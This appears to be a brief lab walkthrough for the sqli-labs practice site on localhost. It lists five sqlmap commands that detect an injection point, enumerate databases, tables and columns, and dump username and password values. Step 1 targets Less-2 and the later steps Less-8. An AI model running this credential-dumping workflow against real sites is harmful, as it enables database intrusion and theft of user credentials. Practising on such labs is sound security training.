1. Detect the injection point
sqlmap.py -u http://localhost/sqli/Less-2/?id=1
2. Time-based blind and boolean-based blind injection are present; next, list the databases
sqlmap.py -u http://localhost/sqli/Less-8/?id=1 --dbs
3. List the tables
sqlmap.py -u http://localhost/sqli/Less-8/?id=1 -D security --tables
4. List the columns
sqlmap.py -u http://localhost/sqli/Less-8/?id=1 -D security -T users --columns
5. Dump the values in the columns
sqlmap.py -u http://localhost/sqli/Less-8/?id=1 -D security -T users -C username,password --dump